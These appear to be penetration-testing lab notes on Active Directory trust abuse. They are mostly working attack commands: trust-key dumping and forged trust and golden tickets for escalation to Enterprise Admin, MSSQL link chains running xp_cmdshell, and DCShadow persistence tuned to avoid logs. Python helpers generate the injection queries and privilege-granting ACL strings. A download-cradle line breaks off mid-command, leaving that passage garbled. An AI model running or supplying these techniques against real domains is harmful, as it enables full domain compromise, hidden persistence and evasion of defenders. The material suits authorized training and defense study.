Priv Esc - Across Trusts ( Cross Trusts Attacks ) Same Forest.

Domains in the same forest have an implicit two-way trust with other domains.

There is a trust key between the parent and child domains.

There are two ways of escalating privileges between two domains of the same forest:

1. krbtgt hash

2. Trust Tickets

Child to Parent Trust Flow:

1. Request TGT, Time stamp encrypted with NTLM hash user

2. DC Check it and Response a TGT

3. Show The TGT and Request The TGS,

4. Request the TGS for an application server in the parent domain. The DC checks the global catalog
and finds that the server for this service is not in its domain but in the parent domain, so the DC responds
with an inter-realm TGT, or Referral Ticket.

5. That inter-realm TGT is now presented to the DC of the parent domain.

The only validation the parent DC does in this case:

whether it can decrypt the inter-realm TGT.

What is the secret which is used to encrypt this inter-realm TGT?

That is the Trust Key.

Can the parent Domain Controller decrypt it?

Yes, it also has a copy of the trust key.

Which step is the most critical one?

Step five, because the inter-realm TGT is presented and the TGS is returned

(because we want to enter another domain in the same forest 😉)

This step is abusable in this case. That means if we have access to the trust key we can
forge an inter-realm TGT which the parent DC would assume to be valid.

Another Example:

1. The user authenticates to DC#1 by sending a request encrypted with their
credentials (timestamp + NTLM hash). DC#1 verifies their identity and sends a TGT.

2. The user sends the TGT back to DC#1, requesting a service ticket for a specific
service, say a SQL service. If the requested service resides in another domain (the
parent domain), DC#1 issues a special ticket called an inter-realm or referral
ticket, encrypted with the trust key, that refers the user to the DC that owns the
service. In our case the user requested access to a SQL service that resides in
DC#2's domain, so DC#1 issued a referral ticket for DC#2.

3. The user presents that inter-realm ticket to DC#2, requesting a SQL service
ticket. DC#2 has a copy of the trust key shared with DC#1; if it can decrypt the
ticket presented by the user, it issues the SQL service ticket as requested without
any additional verification.

📌 DC#2 blindly trusts DC#1 to have verified the user. The risk, as we will see in
the escalation part, is that an attacker who obtains the trust key can forge such
tickets all day long.

4. The user presents the SQL TGS to the database server and gets the intended access.

$_Escalation_Requirements 🚩
Domain Admin privileges on the compromised (child) DC.

The trust key of that DC, to forge the inter-realm TGT.

$_Used_Tools 🔧
Invoke-Mimikatz

Rubeus

$_Escalation_Demo 🔥 DA⇒EA
Our goal is to forge an inter-realm trust ticket that escalates us to Enterprise Admin
using the compromised trust key. This step assumes that you have already gained domain
admin privileges on the child DC.

I obtained the access by abusing the application server's unconstrained delegation in
the previous post.

To forge a trust ticket we need the domain trust key and the SID of the root domain.
Run Invoke-Mimikatz with the trust module (on the DC, or with -ComputerName) to dump
the trust keys:

Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc

# OR, via DCSync of the trust account (mcorp is the NetBIOS name of the parent domain)
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"'

As seen in the screenshot, we obtain all the trust keys from the domain controller.
The [In] and [Out] in front of the domain names indicate the trust direction. In our
case we want access to the root domain "moneycorp.local" from our child domain
"dollarcorp.moneycorp.local", so we choose the first key:
[ In ] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL

After identifying the right trust key, we need the SID of our own (child) domain and
the SID of the root domain to create the fake trust ticket with Enterprise Admin
privileges.

Child to Forest Root using Trust Tickets.

An inter-realm TGT can be forged with the golden module of Invoke-Mimikatz. We supply
the child domain SID of "dollarcorp.moneycorp.local" and, in SIDHistory (/sids), the
Enterprise Admins SID of the root domain "moneycorp.local".

Step one – EA SID

First, collect the Enterprise Admins group SID. No special permission over
moneycorp.local is needed for this, any domain user can read it:

Get-NetGroup -Domain moneycorp.local -GroupName "Enterprise Admins" -FullData | select objectsid

Step two – Current Domain SID

With Mimikatz we can list the domain trusts we have and get the SID of each domain,
including the current one:

mimikatz(powershell) # lsadump::trust

Current domain: dollarcorp.moneycorp.local (dcorp / SID)

Domain: moneycorp.local (mcorp / SID)

Step three – Collect the key that goes into /rc4

For a trust ticket this is the inter-realm trust key dumped in step one
(lsadump::trust /patch, or lsadump::dcsync /user:dcorp\mcorp$). The child domain's
krbtgt hash is only needed for the golden-ticket variant shown later:

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

Step four – Forge the inter-realm ticket (Enterprise Admin via SIDHistory)

Invoke-Mimikatz -Command '"kerberos::golden
/user:Administrator
/domain:dollarcorp.moneycorp.local [child domain]
/sid:<SID of the child domain>
/sids:<SID of Enterprise Admins in the root domain, i.e. <root domain SID>-519>
/rc4:<trust key>
/service:krbtgt
/target:moneycorp.local [root domain]
/ticket:<location to save the ticket>"'

Note\ Forging the ticket happens locally, so no Domain Admin privileges are needed to
run this command; DA was only needed to dump the trust key.

Copy the ticket locally and use it to request a service ticket (TGS) from the root
domain. In the example below we request the CIFS service with Rubeus' asktgs module,
i.e. a TGS for a service (CIFS) in the target domain using the forged trust ticket.
🔴 Note\ Tickets for other services (HOST and RPCSS for WMI, HOST and HTTP for
PowerShell Remoting and WinRM) can be requested the same way.

Rubeus.exe asktgs /ticket:<path to the trust ticket> /service:cifs/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt
# OR (kekeo_old)
.\asktgs.exe <path to the trust ticket>.kirbi CIFS/mcorp-dc.moneycorp.local

After running the command, verify that we have the new TGS with the klist command.

As seen below, we got a TGS as Administrator for the CIFS service on the root domain
controller "mcorp-dc.moneycorp.local" and were able to list the shares on the root DC.

OR inject the TGS with kirbikator.exe:

.\kirbikator.exe lsa .\CIFS.mcorp-dc.moneycorp.local.kirbi

# Now list the C$ share of the root DC
ls \\mcorp-dc.moneycorp.local\c$

So the TGS has been injected and we can access the share.

The other option: do the same with the krbtgt hash of our current (child) domain.
If someone has the krbtgt hash but not the trust key they can fall back to it, and
vice versa.

🔴 Here we forge a TGT instead of an inter-realm ticket, so any TGS requested
afterwards is requested automatically using this TGT (no asktgs step).

# We abuse SID history once again: dump the child krbtgt hash
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
# OR
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

# Now create the golden ticket with the root Enterprise Admins SID in /sids
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'

Inject the saved ticket with kerberos::ptt (or use /ptt instead of /ticket above) and
test access to the root DC:

gwmi -Class win32_operatingsystem -ComputerName mcorp-dc

💥 Very Interesting :
Avoid suspicious logs by forging the ticket as the child DC's machine account instead
of as Administrator. With the Domain Controllers group (RID 516) and Enterprise Domain
Controllers (S-1-5-9) in the ticket, the DCSync that follows appears to come from a
domain controller, which is what is expected to replicate:

Invoke-Mimikatz -Command '"kerberos::golden /user:dcorp-dc$ /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /groups:516 /sids:S-1-5-21-280534878-1496970234-700767426-516,S-1-5-9 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ptt"'

# Dump the NTLM hash of mcorp\Administrator
Invoke-Mimikatz -Command '"lsadump::dcsync /user:mcorp\Administrator /domain:moneycorp.local"'

S-1-5-21-2578538781-2508153159-3419410681-516 – Domain Controllers (RID 516; the
prefix must be the SID of the domain whose Domain Controllers group is claimed)

S-1-5-9 – Enterprise Domain Controllers

Cross Forest Attack ( External Trust )

Recall that our current domain (DollarCorp) has an external bidirectional trust with
another forest, for example EuroCorp.

If we have access to the trust key we can forge an inter-realm TGT for that external
trust as well.

The difference from the same-forest case: SID history is filtered across a forest
boundary (SID filtering), so we cannot put the Enterprise Admins SID in /sids to
escalate. We only get access as the forged user, to whatever is shared with our domain.

# Trust key for the inter-forest trust:
Invoke-Mimikatz -Command '"lsadump::trust /patch"'
# OR
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

# Forge the inter-forest TGT
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /rc4:<KEY_OF_TRUST_FOREST> /service:krbtgt /target:eurocorp.local /ticket:C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi"'

# Get a TGS for a service (CIFS below) in the target domain by using the forged trust ticket.
.\asktgs.exe C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi CIFS/eurocorp-dc.eurocorp.local
# Tickets for other services (like HOST and RPCSS for WMI, HOST and
# HTTP for PowerShell Remoting and WinRM) can be created as well.

# Inject the TGS and use it to access the targeted service
.\kirbikator.exe lsa .\CIFS.eurocorp-dc.eurocorp.local.kirbi

ls \\eurocorp-dc.eurocorp.local\forestshare\

# Note: we can only access resources that are shared with us; anything else fails
# because it is not shared with us.

Interesting part here: with nothing more than the trust key of our own domain we get
an authenticated foothold in another forest. Escalating further there is then a normal
domain attack (enumeration, delegation, ACLs), because SID filtering blocks the
EA/DA shortcut that works inside a forest.

Trust Abuse - MSSQL Servers

MSSQL servers are generally deployed in plenty in a Windows domain.

SQL servers provide very good options for lateral movement, as domain users can be
mapped to database roles.

Let's use PowerUpSQL:

# Discovery (SPN scanning) -> finds everything with an MSSQL SPN in the domain
Get-SQLInstanceDomain

# Check accessibility -> which of those servers we can actually connect to
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose

# Gather information (version, service account, our privileges) for the accessible servers
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
Database Links:
A database link allows a SQL server to access external data sources such as other SQL
servers and OLE DB data sources.

In the case of database links between SQL servers (linked SQL servers) it is possible
to execute stored procedures on the remote server.

Database links work even across forest trusts.

# Searching for database links

# Look for links to remote servers
Get-SQLServerLink -Instance dcorp-mssql -Verbose

# OR manually (run this query from HeidiSQL)
select * from master..sysservers

Output: a link to another server called DCORP-SQL1, with DatabaseLinkLocation → Remote.

Enumerate Database Links - Manually

The openquery() function can be used to run queries on a linked server:

select * from openquery("NAME_OF_DB_LINK",'QUERY')

select * from openquery("DCORP-SQL1",'select * from master..sysservers')

The single quotes matter a lot: every additional link you go through doubles the
number of single quotes around the inner query (' becomes '' one hop in, '''' two
hops in, and so on).

Keep jumping onto different links manually:

select * from openquery("DCORP-SQL1",'select * from openquery("DCORP-MGMT",''select * from master..sysservers'')')
and so on.

# Enumerating database links -> PowerUpSQL crawls the whole chain for us
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose

Executing Commands ( xp_cmdshell )
On the target server xp_cmdshell should be enabled.

If RPC Out is enabled on the link (it is disabled by default), xp_cmdshell can be
enabled remotely with:

EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT "eu-sql"

# Execute a command on every server in the link chain (ft = Format-Table)
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'" | ft

# Manually, three hops deep (note the quote doubling at each hop)
select * from openquery("dcorp-sql1",'select * from openquery("dcorp-mgmt",''select * from openquery("eu-sql.eu.eurocorp.local",''''select @@version as version;exec master..xp_cmdshell "powershell whoami"'''')'')')

We can execute commands across a forest trust just by using database links.

So, how do we get a reverse shell on the EU-SQL server? Run a PowerShell download
cradle through xp_cmdshell with the link crawl:

Get-SQLServerLinkCrawl -Instance dcorp-mssql.domain.forest.local -Query 'exec master..xp_cmdshell "powershell iex (New-Object
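Added example (my own, not PowerUpSQL or course code): a small Python helper that builds the nested openquery() string for any chain of links, plus the xp_cmdshell variant and the EXECUTE ... AT statement, doing the single-quote doubling per hop mechanically so the three-hop query above does not have to be written by hand. The server names are the lab values from these notes; the strings it returns are what you paste into HeidiSQL.

```python
"""Build nested openquery() strings for a chain of SQL Server links.

Added example for these notes (not PowerUpSQL or course code). Every hop through
a link wraps the inner query in a single-quoted literal, so each hop doubles the
single quotes of everything inside it. Doing that by hand for three links is error
prone; these helpers do it mechanically. Server names below are the lab values
from the notes.
"""
from typing import Sequence


def quote_literal(text: str) -> str:
    """Escape text for use inside a T-SQL single-quoted string literal."""
    return text.replace("'", "''")


def nested_openquery(links: Sequence[str], query: str) -> str:
    """Wrap `query` in one openquery() per link, outermost link first.

    nested_openquery(["A", "B"], q) ->
        select * from openquery("A",'select * from openquery("B",''q'')')
    """
    if not links:
        return query
    inner = nested_openquery(links[1:], query)
    return f'select * from openquery("{links[0]}",\'{quote_literal(inner)}\')'


def xp_cmdshell_via_links(links: Sequence[str], command: str) -> str:
    """Run an OS command with xp_cmdshell on the last server of the chain.

    The command is placed in double quotes (as in the notes), so it must not
    contain double quotes itself; single quotes are escaped per hop as above.
    """
    if '"' in command:
        raise ValueError("command must not contain double quotes")
    query = f'select @@version as version;exec master..xp_cmdshell "{command}"'
    return nested_openquery(links, query)


def enable_xp_cmdshell_at(linked_server: str) -> str:
    """EXECUTE ... AT statement that enables xp_cmdshell on a directly linked
    server. Only works when RPC Out is enabled on that link."""
    return (
        "EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') "
        f'AT "{linked_server}"'
    )


if __name__ == "__main__":
    print(nested_openquery(["dcorp-sql1", "dcorp-mgmt"], "select * from master..sysservers"))
    print(xp_cmdshell_via_links(
        ["dcorp-sql1", "dcorp-mgmt", "eu-sql.eu.eurocorp.local"], "powershell whoami"))
    print(enable_xp_cmdshell_at("eu-sql"))
```

The recursion builds from the innermost server outwards, so the server list is written in the order you hop (first link first), and the quote count at the innermost level is 2^N for N hops, which matches the '''' you see in the three-hop query above.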

Forest Persistence - DCShadow
DCShadow temporarily registers a new domain controller in the target domain and uses
it to "push" attributes like:

SIDHistory

SPNs

on specified objects, without leaving change logs for the modified object.

So there are no Event ID 4662 (Directory Service Access, "an operation was performed
on an object") entries for the change.

How is the new domain controller registered?

The new DC is registered by modifying multiple objects, for example:

the Configuration container,

SPNs on the computer object from which the attack is executed,

and a couple of RPC services.

Because the attributes are changed from a "domain controller", there are no
Directory Service Changes logs on the real DC for the target object.

By default Domain Admin privileges are required to use DCShadow.

It is possible to execute DCShadow without DA (see the minimal permissions below).

The attacker's machine must be part of the forest root domain for DCShadow to succeed.

💥 Attacking:
We need two Mimikatz instances:

1. One running with SYSTEM privileges, which starts the RPC server and specifies the
object and attributes to be modified:

a. lsadump::dcshadow /object:<userName> /attribute:Description /value="Hello From DCShadow"

2. One with enough privileges (DA by default, or the minimal permissions below) that
pushes the value:

a. lsadump::dcshadow /push

Demo:
Start Mimikatz and run it with SYSTEM privileges.

For this lab, two shells are required:

1. one running with SYSTEM privileges

2. one with the privileges of a domain member that is in the Domain Admins group

# Load the driver in mimikatz and get a SYSTEM token:
!+
!processtoken
# Check that we are SYSTEM:
token::whoami

Now run this command to change the value of the attribute for a specific user:

lsadump::dcshadow /object:root13user /attribute:Description /value="Hello From DCShadow"

How did we get DA here?

When we escalated from DA of DollarCorp to EA using the krbtgt hash of DollarCorp, we
obtained the hash of the Administrator of moneycorp.local, which we can now pass:

sekurlsa::pth /user:Administrator /domain:moneycorp.local /ntlm:<HASH_OF_ADMINISTRATOR> /impersonate

From that Domain Admin context run lsadump::dcshadow /push to push the attribute.

In a DCShadow attack there are no change logs on the target object.

DCShadow Minimal Permissions:

DCShadow can be used with minimal permissions by modifying the ACLs of:

The domain object:

DS-Install-Replica (Add/Remove Replica in Domain)

DS-Replication-Manage-Topology (Manage Replication Topology)

DS-Replication-Synchronize (Replication Synchronization)

The Sites object (and its children) in the Configuration container:

CreateChild and DeleteChild

The computer object which is registered as a DC:

WriteProperty (not Write)

The target object:

WriteProperty (not Write)

We can set all of these manually,

OR

we can use Set-DCShadowPermissions from Nishang to set the permissions.

With Domain Admin privileges we can modify any object from any machine. With the
minimal permissions the scope is much more restricted: they are tied to one fake DC,
one target object and one user.

For example, to use DCShadow as user student1 to modify the root1user object from the
machine mcorp-student1:

Set-DCShadowPermissions -FakeDC mcorp-student1 -SAMAccountName root1user -Username student1 -Verbose

We must be logged in on mcorp-student1 as student1 so that we can modify root1user.

The second Mimikatz instance then no longer has to run as DA. Setting these
permissions in the first place, however, requires DA on moneycorp.local.

Now run Mimikatz and the DCShadow module as before:

lsadump::dcshadow /object:root13user /attribute:Description /value="Hello DCShadow Without DA"

Then run the second Mimikatz with our own (student) privileges and push.

Once we have the permissions sorted out, a lot of interesting stuff can be done.

For example, set SIDHistory of a user account to the EA or DA group:

lsadump::dcshadow /object:<user> /attribute:SIDHistory /value:<root domain SID>-519   -> EA

lsadump::dcshadow /object:student1 /attribute:SIDHistory /value:<root domain SID>-519   -> EA

# To use the above without DA, first grant the minimal permissions
# (-SAMAccountName is the target object, i.e. the one named in /object:)
Set-DCShadowPermissions -FakeDC mcorp-student1 -SAMAccountName root1user -Username student1 -Verbose

Set primaryGroupID of a user account to the EA or DA group:

lsadump::dcshadow /object:<user> /attribute:primaryGroupID /value:519   -> EA

We can also modify ntSecurityDescriptor of AdminSDHolder to add Full Control for a user.

💡 First retrieve the current ACL (SDDL) of AdminSDHolder:

(New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=AdminSDHolder,CN=System,DC=moneycorp,DC=local")).psbase.ObjectSecurity.sddl

In the output there are Full Control ACEs for SY, BA and DA. We append a copy of one
of them to the end of the DACL, with the trustee replaced by our user's SID.

SY → System

BA → Built-in Administrators

DA → Domain Admins

So: take the ACE for Built-in Administrators, copy it, and replace BA with our user's
SID (the SY and DA entries look the same, so any of them works as the template).

Now it's time for DCShadow 🙂
lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=moneycorp,DC=local /attribute:ntSecurityDescriptor /value:<modified SDDL>

Then push with the second Mimikatz running with DA privileges.

Now let's check our permissions on AdminSDHolder: we have exactly the same
permissions as Built-in Administrators.

Very Interesting Thing ⬇
We can run DCShadow from DCShadow (Shadowception), that is, set the minimal
permissions themselves with DCShadow, without leaving logs 😉

Set-DCShadowPermissions (above) has a problem: it leaves logs when it changes the ACL
of the domain object or the Sites object.

How do we avoid leaving those logs? By setting the permissions with DCShadow itself.
We need to append the following ACEs, with our user's SID at the end, to the DACL of
each object:

On the domain object:

(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)   DS-Replication-Manage-Topology

(OA;;CR;9923a32a-3607-11d2-b9be-0000f87a36b2;;UserSID)   DS-Install-Replica

(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)   DS-Replication-Synchronize

On the attacker's computer object:

(A;;WP;;;UserSID)   WP → WriteProperty

On the target user object:

(A;;WP;;;UserSID)

On the Sites object in the Configuration container:

(A;CI;CCDC;;;UserSID)   CI → Container Inherit, CCDC → CreateChild, DeleteChild

# Read the current ACL of the domain object:
(New-Object System.DirectoryServices.DirectoryEntry("LDAP://DC=moneycorp,DC=local")).psbase.ObjectSecurity.sddl

This is the SDDL of the domain object. In the SYSTEM Mimikatz instance, stack the
change with /stack so that several objects can be pushed in one go:

lsadump::dcshadow /stack /object:DC=moneycorp,DC=local /attribute:ntSecurityDescriptor /value:<ACL_FOR_DOMAIN>

In <ACL_FOR_DOMAIN> we append the three domain-object ACEs with our user's SID:
(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)
(OA;;CR;9923a32a-3607-11d2-b9be-0000f87a36b2;;UserSID)
(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)

Now get the ACL of the attacker machine, in our example mcorp-student13:

(New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=mcorp-student13,CN=Computers,DC=moneycorp,DC=local")).psbase.ObjectSecurity.sddl

lsadump::dcshadow /stack /object:mcorp-student13$ /attribute:ntSecurityDescriptor /value:<ACL_FOR_Attacker>

In <ACL_FOR_Attacker> we append (A;;WP;;;UserSID).

Now get the ACL of the target user, in our example root13user:

(New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=root13user,CN=Users,DC=moneycorp,DC=local")).psbase.ObjectSecurity.sddl

lsadump::dcshadow /stack /object:root13user /attribute:ntSecurityDescriptor /value:<ACL_FOR_TargetUser>

In <ACL_FOR_TargetUser> we append (A;;WP;;;UserSID).

Finally get the ACL of the Sites object in the Configuration container and append (A;CI;CCDC;;;UserSID):

(New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=Sites,CN=Configuration,DC=moneycorp,DC=local")).psbase.ObjectSecurity.sddl

lsadump::dcshadow /stack /object:CN=Sites,CN=Configuration,DC=moneycorp,DC=local /attribute:ntSecurityDescriptor /value:<ACL_FOR_Sites>

And now push it:

# First Mimikatz (SYSTEM): start the fake DC with the stacked changes
lsadump::dcshadow
# Second Mimikatz (with DA, this one time): push
lsadump::dcshadow /push

Done 😋.
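Added example (my own, not mimikatz or course code) for the two SDDL edits above: Python that takes the text returned by .psbase.ObjectSecurity.sddl, appends the DCShadow ACEs (with the user's SID) to the DACL while keeping any SACL section behind them, and clones the BA ACEs of AdminSDHolder to the user. The sample descriptor and the student SID are constructed for the example, not captured from a lab DC; conditional (XA/XD) ACEs are not handled.

```python
"""Edit the SDDL of an AD object for DCShadow (added example, not mimikatz code).

Input is the text that
(New-Object System.DirectoryServices.DirectoryEntry("LDAP://...")).psbase.ObjectSecurity.sddl
returns; output goes into lsadump::dcshadow ... /attribute:ntSecurityDescriptor /value:...
Only plain ACEs are handled: conditional (XA/XD) ACEs contain ':' and nested '('
and would confuse the splitting below.
"""
import re

# Control-access rights the DCShadow user needs on the domain object (GUIDs as in the notes)
DS_REPLICATION_MANAGE_TOPOLOGY = "1131f6ac-9c07-11d1-f79f-00c04fc2dcd2"
DS_INSTALL_REPLICA = "9923a32a-3607-11d2-b9be-0000f87a36b2"
DS_REPLICATION_SYNCHRONIZE = "1131f6ab-9c07-11d1-f79f-00c04fc2dcd2"

ACE_RE = re.compile(r"\([^()]*\)")


def group_sid(domain_sid: str, rid: int) -> str:
    """Domain SID + RID, e.g. group_sid(root_sid, 519) -> Enterprise Admins of that domain."""
    if not domain_sid.startswith("S-1-5-21-"):
        raise ValueError("expected a domain SID of the form S-1-5-21-...")
    return f"{domain_sid}-{rid}"


def dcshadow_aces(user_sid: str) -> dict:
    """The ACEs to append per object so user_sid can run DCShadow without DA."""
    return {
        "domain": [
            f"(OA;;CR;{DS_REPLICATION_MANAGE_TOPOLOGY};;{user_sid})",
            f"(OA;;CR;{DS_INSTALL_REPLICA};;{user_sid})",
            f"(OA;;CR;{DS_REPLICATION_SYNCHRONIZE};;{user_sid})",
        ],
        "attacker_computer": [f"(A;;WP;;;{user_sid})"],
        "target_object": [f"(A;;WP;;;{user_sid})"],
        "sites": [f"(A;CI;CCDC;;;{user_sid})"],
    }


def split_sddl(sddl: str):
    """Return (everything up to the end of the DACL, the SACL part or '')."""
    dacl = sddl.find("D:")
    if dacl < 0:
        raise ValueError("SDDL has no DACL section")
    sacl = sddl.find("S:", dacl)
    return (sddl, "") if sacl < 0 else (sddl[:sacl], sddl[sacl:])


def append_dacl_aces(sddl: str, aces) -> str:
    """Append ACEs to the end of the DACL; the SACL (S:...) stays behind them.
    ACEs that are already present are not added twice."""
    head, sacl = split_sddl(sddl)
    return head + "".join(a for a in aces if a not in head) + sacl


def clone_trustee_aces(sddl: str, trustee: str, user_sid: str) -> str:
    """Copy every DACL ACE granted to `trustee` (e.g. "BA") to user_sid.
    This is the AdminSDHolder trick: same rights as Built-in Administrators."""
    head, _ = split_sddl(sddl)
    copies = []
    for ace in ACE_RE.findall(head[head.find("D:"):]):
        fields = ace[1:-1].split(";")  # type;flags;rights;object;inherit_object;trustee
        if fields[5] == trustee:
            fields[5] = user_sid
            copies.append("(" + ";".join(fields) + ")")
    return append_dacl_aces(sddl, copies)


if __name__ == "__main__":
    # Constructed sample descriptor, not captured from a lab DC.
    sample = ("O:DAG:DAD:PAI(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;SY)"
              "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;BA)(A;;LCRPLORC;;;AU)"
              "S:AI(AU;CISA;WPWDWO;;;WD)")
    student = "S-1-5-21-280534878-1496970234-700767426-1107"  # hypothetical user SID
    print(append_dacl_aces(sample, dcshadow_aces(student)["domain"]))
    print(clone_trustee_aces(sample, "BA", student))
```

Appending at the very end of the string, as one would do by hand, puts the new ACE into the SACL when the object has one (the S: part); the split above is what keeps it in the DACL, and the dedup check makes a re-run after a partial push harmless.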
